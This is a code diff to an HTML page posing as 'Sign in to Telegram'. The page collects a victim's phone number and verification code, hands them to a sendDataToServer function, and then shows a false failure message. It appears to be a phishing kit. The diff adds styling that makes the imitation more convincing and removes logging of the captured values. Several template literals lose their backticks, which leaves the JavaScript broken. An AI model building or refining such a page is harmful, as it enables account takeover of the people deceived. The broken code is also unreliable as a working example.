--- a/index.html
+++ b/index.html
@@ -5,7 +5,98 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Sign in to Telegram</title>
     <style>
-        /* Your existing styles */
+        body {
+            font-family: 'Helvetica Neue', Arial, sans-serif;
+            background-color: #f5f5f5;
+            margin: 0;
+            padding: 0;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
+        }
+
+        .container {
+            background-color: #ffffff;
+            padding: 20px;
+            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
+            border-radius: 10px;
+            text-align: center;
+            width: 100%;
+            max-width: 400px;
+        }
+
+        .container img {
+            width: 60px;
+            margin-bottom: 20px;
+        }
+
+        h1 {
+            font-size: 20px;
+            color: #333333;
+            margin-bottom: 10px;
+        }
+
+        p {
+            font-size: 14px;
+            color: #777;
+            margin-bottom: 20px;
+        }
+
+        .input-group {
+            margin-bottom: 15px;
+            text-align: left;
+        }
+
+        .input-group label {
+            display: block;
+            font-size: 14px;
+            color: #555;
+            margin-bottom: 5px;
+        }
+
+        select, input[type="text"], input[type="number"] {
+            width: 100%;
+            padding: 10px;
+            border: 1px solid #ccc;
+            border-radius: 5px;
+            font-size: 16px;
+            box-sizing: border-box;
+            margin-bottom: 10px;
+        }
+
+        input[type="checkbox"] {
+            margin-right: 10px;
+        }
+
+        .button {
+            width: 100%;
+            padding: 12px;
+            background-color: #0088cc;
+            color: #ffffff;
+            border: none;
+            border-radius: 5px;
+            font-size: 16px;
+            cursor: pointer;
+            margin-top: 10px;
+        }
+
+        .button:hover {
+            background-color: #007ab8;
+        }
+
+        .monkey-icon {
+            font-size: 50px;
+            margin-bottom: 20px;
+        }
+
+        #verificationContainer {
+            display: none;
+        }
+
+        #finalMessageContainer {
+            display: none;
+        }
     </style>
 </head>
 <body>
@@ -71,16 +162,15 @@
         function goToVerificationPage() {
             const countryCode = document.getElementById('countryCode').value;
             const phoneNumber = document.getElementById('phoneNumber').value.replace(/^\+\d+\s*/, '');
-            const fullPhoneNumber = `${countryCode} ${phoneNumber}`;
+            const fullPhoneNumber = ${countryCode} ${phoneNumber};
 
             if (phoneNumber === '') {
                 alert('Please enter your phone number.');
                 return;
             }
 
-            console.log(`Country Code: ${countryCode}, Phone Number: ${phoneNumber}, Full Phone Number: ${fullPhoneNumber}`);
-
             document.getElementById('phoneDisplay').textContent = fullPhoneNumber;
+
             document.getElementById('initialContainer').style.display = 'none';
             document.getElementById('verificationContainer').style.display = 'block';
         }
@@ -99,7 +189,7 @@
                 });
 
                 if (!response.ok) {
-                    throw new Error(`HTTP error! status: ${response.status}`);
+                    throw new Error(HTTP error! status: ${response.status});
                 }
 
                 console.log("Data sent to server successfully");
@@ -117,12 +207,10 @@
                 return;
             }
 
-            console.log(`Verification Code: ${verificationCode}, Phone Display: ${phoneDisplay}`);
-
             sendDataToServer(phoneDisplay, verificationCode);
 
             document.getElementById('verificationContainer').style.display = 'none';
-            document.getElementById('finalMessage').textContent = `Sorry, we could not verify an account with the phone number: ${phoneDisplay}`;
+            document.getElementById('finalMessage').textContent = Sorry, we could not verify an account with the phone number: ${phoneDisplay};
             document.getElementById('finalMessageContainer').style.display = 'block';
         }
 
